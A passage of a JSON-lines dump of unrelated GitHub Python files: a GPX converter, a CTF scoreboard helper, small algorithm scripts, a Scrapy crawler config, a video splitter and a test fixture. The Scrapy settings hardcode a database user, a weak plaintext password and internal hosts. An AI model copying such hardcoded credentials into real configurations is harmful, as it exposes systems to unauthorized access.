valid[choice]\n        else:\n            sys.stdout.write(\"Please respond with a 'yes' or 'no' (or 'y' or 'n').\\n\")\n\n####\n# Parses the GPX to get all of the waypoints\n#\n# Returns a list of waypoints and their attributes\n####\ndef parseGPX(gpx_path):\n    # Setup the GPX namespace\n    namespace = {\"gpx\": \"http://www.topografix.com/GPX/1/1\"}\n\n    # Start parsing the GPX XML\n    gpxTree = ET.parse(gpx_path)\n    root = gpxTree.getroot()\n\n    # Create list to store the GPX items\n    waypoints = []\n\n    # Iterate over all of the waypoints\n    for waypoint in root.findall(\"gpx:wpt\", namespace):\n        wpt = {'lat': waypoint.attrib['lat'], 'lon': waypoint.attrib['lon'], 'ele': '', 'time': '', 'name': '', 'desc': ''}\n\n        for item in waypoint:\n            if item.tag == \"{http://www.topografix.com/GPX/1/1}ele\":\n                wpt['ele'] = item.text.encode('utf-8')\n            if item.tag == '{http://www.topografix.com/GPX/1/1}time':\n                wpt['time'] = item.text.encode('utf-8')\n            if item.tag == '{http://www.topografix.com/GPX/1/1}name':\n                wpt['name'] = item.text.encode('utf-8')\n            if item.tag == '{http://www.topografix.com/GPX/1/1}desc':\n                wpt['desc'] = item.text.encode('utf-8')\n\n        waypoints.append(wpt)\n\n    return waypoints\n\n\n####\n# Converts the GPX file to a CSV file\n####\ndef convertGPX(gpx_path, csv_path, overwriteCSV=False):\n    if os.path.isfile(csv_path) and not overwriteCSV:\n        logger.error(csv_path + \" already exists. Exiting...\")\n        sys.exit() # Nothing we can do here\n    if not os.path.isfile(gpx_path):\n        logger.error(gpx_path + \" does not exist. Exiting...\")\n        sys.exit() # Nothing to work with!\n\n    if os.path.isfile(csv_path):\n        os.remove(csv_path)\n\n    # Get the waypoints from the GPX file\n    waypoints = parseGPX(gpx_path)\n\n    # Write the data to CSV\n    csvFields = ['name', 'lat', 'lon', 'ele', 'desc', 'time']\n\n    with open(csv_path, 'w') as csvFile:\n        writer = csv.DictWriter(csvFile, fieldnames = csvFields)\n        writer.writeheader()\n\n        writer.writerows(waypoints)\n\n\n# Handle the command line arguments\nparser = argparse.ArgumentParser(description=\"A simple utility to convert GPX files to a CSV file.\")\nparser.add_argument(\"--input\", dest=\"gpx_path\", help=\"Path to the GPX file\")\nparser.add_argument(\"--output\", dest=\"csv_path\", help=\"Path to the resulting CSV file\")\nargs = parser.parse_args()\n\n# Whether or not to overwrite an existing CSV file\noverwriteCSV = False\n\nif not args.gpx_path or not args.csv_path:\n    logger.error(\"You must supply an input and output!\")\nelif not os.path.isfile(args.gpx_path):\n    logger.error(\"The input GPX file \" + args.gpx_path + \" does not exist\")\nelif os.path.isfile(args.csv_path):\n    if getYesNo(\"'%s' exists. 
Overwrite it?\" % args.csv_path):\n overwriteCSV = True\n else:\n # Output already exists and user doesn't want to overwrite it, exit...\n sys.exit()\nelse:\n logger.info(\"Converting GPX file \" + args.gpx_path + \" to a CSV file...\")\n convertGPX(args.gpx_path, args.csv_path, overwriteCSV)\n","repo_name":"serialphotog/gpx2csv","sub_path":"gpx2csv.py","file_name":"gpx2csv.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"28627262844","text":"from functools import reduce\nimport json\nfrom typing import Dict, List, NamedTuple, Optional\n\nfrom django.contrib.auth import get_user_model\nfrom django.utils import timezone\n\nfrom problem.models import ProblemInstance, ProblemAuthLog\n\nUser = get_user_model()\n\n\ndef calculate_problem_score(problem_instance, effective_solve_count, is_first_solve):\n points = problem_instance.points\n if effective_solve_count != 0:\n points += problem_instance.distributed_points // effective_solve_count\n points += problem_instance.breakthrough_points if is_first_solve else 0\n return points\n\n\nclass ProblemState(NamedTuple):\n solve_count: int\n first_solve: Optional[User]\n\n\nclass UserState(NamedTuple):\n solved_problems: List[ProblemInstance]\n last_auth: Optional[timezone.datetime]\n\n\nclass ReplayState(NamedTuple):\n datetime: Optional[timezone.datetime]\n user_states: Dict[User, UserState]\n problem_states: Dict[ProblemInstance, ProblemState]\n\n\nclass AuthReplay:\n def __init__(self, problem_list, crunch_timedelta):\n self.problem_list = problem_list\n self.problem_instances = problem_list.probleminstance_set\n self.state = ReplayState(\n datetime=None,\n user_states={},\n problem_states={}\n )\n self.crunch_timedelta = crunch_timedelta\n\n def process_preparation(self, logs, datetime):\n problem_states = self.state.problem_states\n user_states = self.state.user_states\n solved_log_queries = []\n\n # Collect correct auth log query (solved_log_queries) and update problem state (last line) per problem instance\n for problem_instance in self.problem_instances.all():\n correct_auth_key = problem_instance.problem.auth_key\n solve_logs = logs.filter(problem_instance=problem_instance, auth_key=correct_auth_key)\n solved_log_queries.append(solve_logs)\n\n first_solve_log = solve_logs.first() if solve_logs.exists() else None\n solve_count = solve_logs.count()\n\n first_solve_user = first_solve_log.user if first_solve_log is not None else None\n\n previous_state = problem_states.get(problem_instance, ProblemState(0, None))\n new_state = \\\n ProblemState(\n solve_count=previous_state.solve_count + solve_count,\n first_solve=first_solve_user if previous_state.first_solve is None else previous_state.first_solve\n )\n\n problem_states[problem_instance] = new_state\n\n solve_logs = \\\n reduce(lambda x, y: x | y, solved_log_queries, ProblemAuthLog.objects.none()) \\\n .order_by('datetime')\n user_pks_with_logs = solve_logs.values_list('user', flat=True)\n users_with_logs = User.objects.filter(pk__in=user_pks_with_logs)\n\n # Update user state per user who has a correct auth logs for problem list\n for user in users_with_logs:\n previous_state = user_states.get(user, UserState([], None))\n user_solve_logs = solve_logs.filter(user=user)\n solved_problem_pks = user_solve_logs.values_list('problem_instance', flat=True)\n solved_problems = ProblemInstance.objects.filter(pk__in=solved_problem_pks)\n last_auth = user_solve_logs.last().datetime\n\n 
user_states[user] = UserState(\n solved_problems=previous_state.solved_problems + list(solved_problems),\n last_auth=last_auth\n )\n\n self.state = ReplayState(\n datetime=datetime,\n user_states=user_states,\n problem_states=problem_states\n )\n\n def prepare(self):\n datetime_pivot = timezone.now() - self.crunch_timedelta\n logs = ProblemAuthLog.objects \\\n .filter(problem_instance__in=self.problem_instances.all(), datetime__lte=datetime_pivot) \\\n .order_by('datetime')\n\n if self.state.datetime is not None:\n logs = logs.filter(datetime__gt=self.state.datetime)\n\n self.process_preparation(logs, datetime_pivot)\n\n def update_points_function(self, points_functions, problem_instance, state_diffs):\n problem_state = self.state.problem_states[problem_instance]\n problem_state_diff = state_diffs.get(problem_instance, None)\n solve_count = problem_state.solve_count\n first_solver = problem_state.first_solve\n\n if problem_state_diff is not None:\n solve_count += problem_state_diff.solve_count\n if first_solver is None:\n first_solver = problem_state_diff.first_solve\n\n if solve_count == 0:\n return\n\n points_functions[problem_instance] = \\\n lambda user: calculate_problem_score(problem_instance, solve_count, user == first_solver)\n\n def calc_user_points(self, user, problem_instance, points_functions, state_diffs):\n user_state = self.state.user_states.get(user, UserState([], None))\n user_state_diff = state_diffs.get(user, UserState([], None))\n all_solved_problems = user_state.solved_problems + user_state_diff.solved_problems\n\n if problem_instance not in all_solved_problems:\n return 0\n\n return points_functions[problem_instance](user)\n\n def get_statistic_data(self):\n if self.state.datetime is None:\n return [], []\n\n problem_state_diffs = {}\n user_state_diffs = {}\n\n points_functions = {}\n user_points = {}\n\n for problem_instance in self.state.problem_states:\n self.update_points_function(points_functions, problem_instance, problem_state_diffs)\n\n for user, state in self.state.user_states.items():\n # pylint: disable=cell-var-from-loop\n user_points[user] = \\\n sum(map(\n lambda x: self.calc_user_points(user, x, points_functions, user_state_diffs),\n state.solved_problems))\n\n datetime_pivot = self.state.datetime\n\n logs = ProblemAuthLog.objects \\\n .filter(\n problem_instance__in=self.problem_instances.all(),\n datetime__gt=datetime_pivot)\n solved_log_queries = []\n for problem_instance in self.problem_instances.all():\n correct_auth_key = problem_instance.problem.auth_key\n solve_logs = logs.filter(problem_instance=problem_instance, auth_key=correct_auth_key)\n solved_log_queries.append(solve_logs)\n\n logs_to_replay = \\\n reduce(lambda x, y: x | y, solved_log_queries, ProblemAuthLog.objects.none()) \\\n .order_by('datetime')\n\n def append_chart(timestamp):\n for chart_user, points in user_points.items():\n entry = chart_data.get(chart_user.username, [])\n entry.append({'x': timestamp.isoformat(), 'y': points})\n chart_data[chart_user.username] = entry\n\n chart_data = {}\n append_chart(datetime_pivot)\n\n for log in logs_to_replay:\n for user in user_points:\n user_points[user] -= self.calc_user_points(\n user, log.problem_instance, points_functions, user_state_diffs)\n\n prev_problem_state = problem_state_diffs.get(log.problem_instance, ProblemState(0, None))\n problem_state_diffs[log.problem_instance] = \\\n ProblemState(\n solve_count=prev_problem_state.solve_count + 1,\n first_solve=prev_problem_state.first_solve\n if prev_problem_state.first_solve is not 
None else\n                    log.user\n                )\n            self.update_points_function(points_functions, log.problem_instance, problem_state_diffs)\n\n            for user in user_points:\n                user_points[user] += self.calc_user_points(\n                    user, log.problem_instance, points_functions, user_state_diffs)\n\n            prev_user_state = user_state_diffs.get(log.user, UserState([], None))\n            user_state_diffs[log.user] = \\\n                UserState(\n                    solved_problems=prev_user_state.solved_problems + [log.problem_instance],\n                    last_auth=log.datetime\n                )\n            prev_point = user_points.get(log.user, 0)\n            user_points[log.user] = prev_point + self.calc_user_points(\n                log.user, log.problem_instance, points_functions, user_state_diffs)\n\n            append_chart(log.datetime)\n\n        append_chart(timezone.now())\n\n        def get_user_last_auth(rank_user):\n            user_state_diff = user_state_diffs.get(rank_user, None)\n            return self.state.user_states[rank_user].last_auth \\\n                if user_state_diff is None else \\\n                user_state_diff.last_auth\n\n        rank_raw = list(map(lambda x: (x[0].username, x[1], get_user_last_auth(x[0])), user_points.items()))\n        top10_rank = sorted(rank_raw, key=lambda x: (-x[1], x[2]))[:10]\n        top10_users = list(map(lambda x: x[0], top10_rank))\n        top10_chart_data = \\\n            map(lambda x: (x[0], json.dumps(x[1])),\n                filter(lambda x: x[0] in top10_users, chart_data.items()))\n\n        return top10_chart_data, top10_rank\n","repo_name":"PLUS-POSTECH/study.plus.or.kr","sub_path":"src/problem/helpers/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":9240,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"39473049726","text":"\"\"\"\n    Calc pi\n\"\"\"\n\ndef calc_pi(nterms: int) -> float:\n    NUMERATOR: float = 4.0\n    INCREMENT: float = 2.0\n    FLIPSIGN: float = -1.0\n    denominator: float = 1.0\n    operation: float = 1.0\n    pi: float = 0.0\n\n    for _ in range(nterms):\n        pi += operation * (NUMERATOR / denominator)\n        denominator += INCREMENT\n        operation *= FLIPSIGN\n\n    return pi\n\nif __name__ == \"__main__\":\n    print(calc_pi(4000))\n\n\n","repo_name":"riki900/compsci","sub_path":"code/chapter1/calc_pi.py","file_name":"calc_pi.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43370730512","text":"#!/usr/bin/env python3\nimport os\nimport requests\nimport re\nimport sys\n\nTEMPLATE_URL = 'https://en.wiktionary.org/w/index.php?title=Module:zh/data/dial-syn&action=raw'\nTEMPLATE_LOCAL_PATH = '/tmp/zh-dial-syn-template.txt'\n\nlines_ignore = [\n\t'local export = {}',\n\t'export.list = {',\n\t'}',\n\t'return export',\n\t'\\t',\n\t'',\n]\n\n'''\nErutuon:\nidea: temporarily collect comment lines and\nassociate them with the next content line with a dict\n(where keys are content lines and values are lists of preceding comments), then\ninsert them into lines before the content lines in the \"recall line\" loop\n\nin the two examples above,\nthe rough equivalent of `comments['export.list = {'] = ['-- th = 趿; s = 靸 (except Hainan, where s -> t; Min Dong)']`\nwould have to happen somehow in the \"sort\" loop, and then\nin the \"recall line\" loop, `if line in comments: lines[i] = \"\\n\".join(comments[line]) + \"\\n\" + lines[i]`\n\nif current line is comment,\ninsert into current_comments, otherwise if\ncurrent_comments is not empty,\ncomments[line] = current_comments and empty current_comments;\nassuming nobody adds a comment on the last line for some reason\n'''\n\n# ----\n\ndef main(page):\n\t# collection of lines.\n\t# if global and this is 
used as a module,\n\t# this is not cleared on every invocation if it is global\n\t# and words carry over. blargh\n\tcollection = {\n\t\t'content': {},\n\t\t'comments': [],\n\t\t'other': [],\n\t}\n\n\ttemplate_content = None\n\tif not os.path.exists(TEMPLATE_LOCAL_PATH):\n\t\twith open(TEMPLATE_LOCAL_PATH, mode = 'x', encoding = 'utf-8') as file:\n\t\t\tprint('Downloading template...')\n\t\t\ttemplate_content = requests.get(TEMPLATE_URL).content.decode('utf-8')\n\t\t\tfile.write(template_content)\n\telse:\n\t\twith open(TEMPLATE_LOCAL_PATH, mode = 'r', encoding = 'utf-8') as file:\n\t\t\tprint('Loaded template from local.')\n\t\t\ttemplate_content = file.read()\n\n\t#deprecated = ['Sabah', 'Luchuan', 'Doumen', 'Huidong']\n\n\t# ----\n\n\t# fix tabs\n\tpage.text = re.sub(r'^ {4}', r'\\t', page.text, flags = re.M)\n\n\t# load text\n\tlines = page.text.splitlines()\n\n\t# sort lines into content, ignore, and other\n\tfor i, line in enumerate(lines):\n\t\t# trim whitespace, right\n\t\tline = line.rstrip()\n\n\t\tif re.findall(r'^\\t(--)?\\[', line):\n\t\t\tis_comment = re.search(r'^\\t--\"', line)[1]\n\t\t\tlocation = re.search(r'\"([^\"]+)\"', line)[1]\n\t\t\tline = re.search(r' *= *(.+)$', line)[1]\n\n\t\t\t# add commas\n\t\t\tline = re.sub(r'(\\})( *--.+|)$', r'\\1,\\2', line)\n\n\t\t\tcollection['content'][location] = (is_comment, line)\n\t\telif re.findall(r'^\\t*--', line):\n\t\t\tcollection['comments'].append((lines[i], lines[i], lines[i+1]))\n\t\telif line in lines_ignore:\n\t\t\tpass\n\t\telse:\n\t\t\tcollection['other'].append(line)\n\n\t# ----\n\n\tlines = template_content.splitlines()\n\n\t# recall line\n\tfor i, line in enumerate(lines):\n\t\tif re.findall(r'^\\t(--)?\\[', line):\n\t\t\t_ = re.findall(r'\"([^\"]+)\"', line)\n\t\t\tlocation = _[0]\n\t\t\tif location in collection['content']:\n\t\t\t\tlines[i] = re.sub(r'(= )(.+)$', r'\\1', lines[i])\n\t\t\t\tlines[i] += collection['content'][location]\n\n\t\t\t\t# detect lines that were not recalled\n\t\t\t\t# such as misspelled locations\n\t\t\t\tcollection['content'].pop(location)\n\n\tpage.text = '\\n'.join(lines)\n\n\t# deprecated locations\n\t# regex abuse :))\n\t#page.text = re.sub(r'\\n\\t--\\[\"[A-Za-z]+\"\\]\\t+= { \"\" },\\n', r'\\n', page.text)\n\n\t# print lines that were not recalled\n\tif len(collection['content']) > 0:\n\t\twith open('leftover.txt', mode = 'a', encoding = 'utf-8') as file:\n\t\t\tfile.write('####\\n')\n\t\t\tfile.write(page.title() + '\\n')\n\t\t\tfor line in collection['content']:\n\t\t\t\tfile.write(line + '\\n')\n\t\t\tfile.write('####' + '\\n')\n\t\tprint(collection['content'])\n\t\tinput()\n\n\t# print comments that were not recalled\n\tif len(collection['comments']) > 0:\n\t\twith open('comments.txt', mode = 'a', encoding = 'utf-8') as file:\n\t\t\tfile.write('####\\n')\n\t\t\tfile.write(page.title() + '\\n')\n\t\t\tfor line in collection['comments']:\n\t\t\t\tfile.write(line + '\\n')\n\t\t\tfile.write('####' + '\\n')\n\t\tprint(collection['comments'])\n\t\tinput()\n\n\t# print other lines\n\tif len(collection['other']) > 0:\n\t\twith open('other.txt', mode = 'a', encoding = 'utf-8') as file:\n\t\t\tfile.write('####\\n')\n\t\t\tfile.write(page.title() + '\\n')\n\t\t\tfor line in collection['other']:\n\t\t\t\tfile.write(line + '\\n')\n\t\t\tfile.write('####' + '\\n')\n\t\tprint(collection['other'])\n\t\tinput()\n\n\treturn page\n\nif __name__ == '__main__':\n\t# dummy object\n\t# https://stackoverflow.com/a/2827664\n\tclass ObjectFoo(object):\n\t\tpass\n\tpage = ObjectFoo()\n\tdef 
_():\n\t\treturn 'Project:Foobar'\n\tpage.title = _\n\n\twith open(sys.argv[1], mode = 'r', encoding = 'utf-8') as file:\n\t\tpage.text = file.read()\n\tpage = main(page)\n\tprint(page.text)\n","repo_name":"szc126/misc","sub_path":"script/wiktionary/zhdialsyn.py","file_name":"zhdialsyn.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4207808684","text":"class Solution(object):\n    def combinationSum(self, candidates, target):\n        \"\"\"\n        :type candidates: List[int]\n        :type target: int\n        :rtype: List[List[int]]\n        \"\"\"\n\n        result = []\n        self.dfs(candidates, target, [], result)\n        return result\n\n\n    def dfs(self, candidates, target, path, result):\n        if target == 0:\n            # the path perfectly adds up to the target\n            result.append(path)\n            return\n        elif target < 0:\n            # the path does not lead to the target\n            return\n        else:\n            for i in range(len(candidates)):\n                self.dfs(candidates[i:], target - candidates[i], path + [candidates[i]], result)\n        \n","repo_name":"vincehientran/Leetcode","sub_path":"Medium/CombinationSum.py","file_name":"CombinationSum.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32999658780","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\nfrom setuptools import setup\n\n\nif sys.argv[-1] == \"publish\":\n    os.system(\"python setup.py sdist bdist_wheel upload\")\n    sys.exit()\n\nrequired = [\n    'humanize',\n    'pytz',\n    'dateparser',\n    'iso8601',\n    'python-dateutil',\n    'ruamel.yaml'\n]\n\nsetup(\n    name='maya',\n    version='0.1.1',\n    description='Datetimes for Humans.',\n    long_description=open('README.rst').read(),\n    author='Kenneth Reitz',\n    author_email='me@kennethreitz.com',\n    url='https://github.com/kennethreitz/maya',\n    py_modules=['maya'],\n    install_requires=required,\n    license='MIT',\n    classifiers=(\n\n    ),\n)\n","repo_name":"smithjc76/maya","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"23246568916","text":"BOT_NAME = 'capitalbankmk'\n\nSPIDER_MODULES = ['capitalbankmk.spiders']\nNEWSPIDER_MODULE = 'capitalbankmk.spiders'\nFEED_EXPORT_ENCODING = 'utf-8'\nLOG_LEVEL = 'ERROR'\nDOWNLOAD_DELAY = 0\n\nROBOTSTXT_OBEY = True\n\nITEM_PIPELINES = {\n\t'capitalbankmk.pipelines.CapitalbankmkPipeline': 100,\n\n}\n\nUSER_AGENT = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0'\n","repo_name":"hristo-grudev/capitalbankmk","sub_path":"capitalbankmk/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30627301965","text":"import argparse\r\nimport os\r\nimport cv2\r\nimport numpy as np\r\nimport multiprocessing\r\n\r\nimport VideoFrameConversion as vfc\r\n\r\ndef get_files(path):\r\n    # read a folder, return the complete path\r\n    ret = []\r\n    for root, dirs, files in os.walk(path):\r\n        for filespath in files:\r\n            ret.append(os.path.join(root, filespath))\r\n    return ret\r\n\r\ndef get_jpgs(path):\r\n    # read a folder, return the image name\r\n    ret = []\r\n    for root, dirs, files in os.walk(path):\r\n        for filespath in files:\r\n            ret.append(filespath)\r\n    return ret\r\n\r\ndef text_save(content, filename, mode = 'a'):\r\n    # save a list to a txt\r\n    # Try to save a 
list variable in txt file.\r\n    file = open(filename, mode)\r\n    for i in range(len(content)):\r\n        file.write(str(content[i]) + '\\n')\r\n    file.close()\r\n\r\ndef check_path(path):\r\n    if not os.path.exists(path):\r\n        os.makedirs(path)\r\n\r\ndef process_video(opt):\r\n    # video statics\r\n    fps, frames, time, width, height = vfc.get_video_info(opt.videopath)\r\n    fps = round(fps)\r\n    width = int(width)\r\n    height = int(height)\r\n    print(\"corrected video fps =\", fps)\r\n    print(\"corrected video width =\", width)\r\n    print(\"corrected video height =\", height)\r\n\r\n    # time range\r\n    if time % opt.small_video_second > 0:\r\n        small_video_num = time // opt.small_video_second + 1\r\n    else:\r\n        small_video_num = time // opt.small_video_second\r\n    small_video_num = int(small_video_num)\r\n    print('There are %d small videos output' % (small_video_num))\r\n    small_video_frame_num = opt.small_video_second * fps\r\n    print('Each small video contains %d frames' % (small_video_frame_num))\r\n\r\n    # name of small videos\r\n    namelist = []\r\n    for i in range(small_video_num):\r\n        name = opt.videopath.split('\\\\')[-1][:-4] + '_small_' + str(i) + '.mp4'\r\n        namelist.append(name)\r\n    print(namelist)\r\n\r\n    # clip small videos\r\n    vc = cv2.VideoCapture(opt.videopath)\r\n    for v in range(small_video_num):\r\n        # create a video writer\r\n        fourcc = cv2.VideoWriter_fourcc('m','p','4','v')\r\n        print('Saving folder:', opt.savepath)\r\n        check_path(opt.savepath)\r\n        savepath = os.path.join(opt.savepath, namelist[v])\r\n        video = cv2.VideoWriter(savepath, fourcc, fps, (width, height))\r\n        for f in range(small_video_frame_num):\r\n            print('This is the %d-th small video, %d-th frame' % (v, f))\r\n            rval, frame = vc.read()\r\n            if not rval:\r\n                break\r\n            video.write(frame)\r\n        video.release()\r\n    \r\n    # release the video\r\n    vc.release()\r\n    cv2.destroyAllWindows()\r\n    print('Released!')\r\n\r\ndef process_video_by_path(opt, videopath):\r\n    # video statics\r\n    fps, frames, time, width, height = vfc.get_video_info(videopath)\r\n    fps = round(fps)\r\n    width = int(width)\r\n    height = int(height)\r\n    print(\"corrected video fps =\", fps)\r\n    print(\"corrected video width =\", width)\r\n    print(\"corrected video height =\", height)\r\n\r\n    # time range\r\n    if time % opt.small_video_second > 0:\r\n        small_video_num = time // opt.small_video_second + 1\r\n    else:\r\n        small_video_num = time // opt.small_video_second\r\n    small_video_num = int(small_video_num)\r\n    print('There are %d small videos output' % (small_video_num))\r\n    small_video_frame_num = opt.small_video_second * fps\r\n    print('Each small video contains %d frames' % (small_video_frame_num))\r\n\r\n    # name of small videos\r\n    namelist = []\r\n    for i in range(small_video_num):\r\n        name = videopath.split('\\\\')[-1][:-4] + '_small_' + str(i) + '.mp4'\r\n        namelist.append(name)\r\n    print(namelist)\r\n\r\n    # clip small videos\r\n    vc = cv2.VideoCapture(videopath)\r\n    for v in range(small_video_num):\r\n        # create a video writer\r\n        fourcc = cv2.VideoWriter_fourcc('m','p','4','v')\r\n        print('Saving folder:', opt.savepath)\r\n        check_path(opt.savepath)\r\n        savepath = os.path.join(opt.savepath, namelist[v])\r\n        video = cv2.VideoWriter(savepath, fourcc, fps, (width, height))\r\n        for f in range(small_video_frame_num):\r\n            if f % (small_video_frame_num // 10) == 0:\r\n                print('This is the %d-th small video, %d-th frame' % (v, f))\r\n            rval, frame = vc.read()\r\n            if not rval:\r\n                break\r\n            video.write(frame)\r\n        video.release()\r\n    \r\n    # release the video\r\n    
vc.release()\r\n cv2.destroyAllWindows()\r\n print('Released!')\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # Define parameters\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--multiprocess', type = bool, default = True, help = 'whether to use multiprocess or not')\r\n parser.add_argument('--small_video_second', type = int, default = 120, help = 'interval of second')\r\n parser.add_argument('--processes_num', type = int, default = 4, help = 'number of CPU used for processing')\r\n parser.add_argument('--videopath', type = str, \\\r\n default = 'F:\\\\Deblur\\\\data collection\\\\video_processed_v2\\\\clip1\\\\interp_1_exposure_type_1.mp4', \\\r\n help = 'video path')\r\n parser.add_argument('--video_folder_path', type = str, \\\r\n default = 'F:\\\\Deblur\\\\data collection\\\\video_processed_v2\\\\clip5', \\\r\n help = 'video folder path')\r\n parser.add_argument('--savepath', type = str, \\\r\n default = 'F:\\\\Deblur\\\\data collection\\\\clip5_small_videos', \\\r\n #default = 'F:\\\\Deblur\\\\Short-Long RGB to RGB Mapping\\\\data\\\\slrgb2rgb_v1', \\\r\n help = 'save path')\r\n opt = parser.parse_args()\r\n print(opt)\r\n\r\n # Process videos\r\n if opt.multiprocess:\r\n\r\n # build video list\r\n videolist = get_jpgs(opt.video_folder_path)\r\n for i in range(len(videolist)):\r\n print(i, videolist[i])\r\n videolist = get_files(opt.video_folder_path)\r\n\r\n # multiprocessing\r\n pool = multiprocessing.Pool(processes = opt.processes_num) # create multiprocessing operator\r\n for i in range(len(videolist)):\r\n pool.apply_async(process_video_by_path, (opt, videolist[i], ))\r\n pool.close() # close multiprocessing operator, which represents no processes can be added\r\n pool.join() # wait for all processed done, which should be run after close method\r\n print(\"Sub-processes all done\")\r\n\r\n else:\r\n process_video(opt)\r\n","repo_name":"zhaoyuzhi/Auto-Crop-Videos-and-Blur-Modelling","sub_path":"video_divider.py","file_name":"video_divider.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"25784949582","text":"# Scrapy settings for scrapy_weibo project\n#\n# For simplicity, this file contains only the most important settings by\n# default. 
All the other settings are documented here:\n#\n# http://doc.scrapy.org/topics/settings.html\n#\n\nBOT_NAME = 'weiboSearchCrawler'\n\nSPIDER_MODULES = ['weiboSearchCrawler.spiders']\nNEWSPIDER_MODULE = 'weiboSearchCrawler.spiders'\n\n# scrapy_redis config\nREDIS_CONFIG = {\n 'host': '10.13.91.251',\n 'port': 6379,\n}\n\n# mysql config\nMYSQL_CONFIG = {\n \"db\": \"D-Insight-2\",\n \"user\": \"udms\",\n \"passwd\": \"123456\",\n \"host\": \"10.13.91.251\",\n \"port\": 3306,\n \"charset\": \"utf8\",\n}\n\n# mongodb config\nMONGO_CONFIG = {\n 'host': '10.13.91.251',\n 'port': 27017,\n}\n\n# Don't cleanup scrapy_redis queues, allows to pause/resume crawls.\nSCHEDULER_PERSIST = False\nQUEUE_KEY = '%(spider)s:requests'\nDUPEFILTER_KEY = '%(spider)s:dupefilter'\nSCHEDULER = \"weiboSearchCrawler.scrapy_redis.scheduler.Scheduler\"\n\n# pipelines config\nITEM_PIPELINES = {\n 'weiboSearchCrawler.pipelines.MongoDBPipeline': 50,\n}\n\nDOWNLOAD_DELAY = 10\nLOG_LEVEL = 'INFO'\n\n# read keywords from 'file' or 'utils'\nBOOTSTRAP = 'file'\n\n# fetch time range HISTORY or YESTERDAY\nFREQUENCY = 'YESTERDAY'\n# the range is in [FETCH_START, FETCH_END)\nFETCH_START = '2015-06-01'\nFETCH_END = '2015-06-25'\n","repo_name":"ustcck/weiboSearchCrawler","sub_path":"weiboSearchCrawler/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4951574945","text":"import argparse\nimport pickle\n# from matplotlib import figure as fig\nimport numpy as np\nimport torch\n\nimport matplotlib.pyplot as plt\n\ndef plot_data(pickle_location):\n \n with open(pickle_location, 'rb') as f:\n crys_array_list = pickle.load(f)\n \n fig = plt.figure(figsize=(15,10),layout=\"constrained\")\n ax = fig.subplot_mosaic(\"\"\"AB\n CC\n DD\n EE\"\"\")\n\n for i in range(0,10):\n ax['A'].plot(crys_array_list['all_atom_types_stack'][0, :, i, 0])\n ax['B'].plot(crys_array_list['all_atom_types_stack'][0, :, i, 1])\n\n\n ax['C'].plot(crys_array_list['all_frac_coords_stack'][0, :, i, 0], alpha=0.6)\n ax['D'].plot(crys_array_list['all_frac_coords_stack'][0, :, i, 1], alpha=0.6)\n ax['E'].plot(crys_array_list['all_frac_coords_stack'][0, :, i, 2], alpha=0.6)\n\n\n plt.savefig(pickle_location[:-7] + '.png')\n\n\ndef main(args):\n \n plot_data(args.pickle_location) \n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--pickle_location')\n\n\n args = parser.parse_args()\n\n main(args)\n","repo_name":"merri5/score_based_crystal_generation","sub_path":"scripts/plot_traj_joint.py","file_name":"plot_traj_joint.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15608932615","text":"import os, sys\nimport pandas as pd\nsys.path.append('../')\nfrom fingerprint.fingeprint_from_smiles import smiles_list_to_fingerprint_dataframe\n\ndef XGBoost_estimator(smiles_list, mode):\n assert type(smiles_list) == list, 'Please input smiles as for list type'\n nBits = 2048\n radius = 3\n df = smiles_list_to_fingerprint_dataframe(smiles_list, nBits=nBits, radius=radius)\n\n x = df.iloc[:, 1:nBits]\n\n if mode == 'BDE':\n model = 'input model in here'\n else:\n model = 'input model in here'\n\n pred_BDE = model.predict(x)\n\n df_gen = pd.DataFrame()\n df_gen['Smiles'] = smiles_list\n df_gen[mode] = pred_BDE\n\n return 
df_gen","repo_name":"nebneb200411/photopolymerization_initiator","sub_path":"xgboost_/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73035530293","text":"import pytest\nfrom tests.functional.plots import with_confirmation, without_confirmation, \\\n refuse_with_confirmation, history_changed, history_not_changed, \\\n select_command_with_arrows, how_to_configure\n\ncontainers = (('thefuck/python3-zsh',\n u'''FROM python:3\n RUN apt-get update\n RUN apt-get install -yy zsh''',\n u'zsh'),\n ('thefuck/python2-zsh',\n u'''FROM python:2\n RUN apt-get update\n RUN apt-get install -yy zsh''',\n u'zsh'))\n\n\n@pytest.fixture(params=containers)\ndef proc(request, spawnu, TIMEOUT):\n proc = spawnu(*request.param)\n proc.sendline(u'pip install /src')\n assert proc.expect([TIMEOUT, u'Successfully installed'])\n proc.sendline(u'eval $(thefuck --alias)')\n proc.sendline(u'export 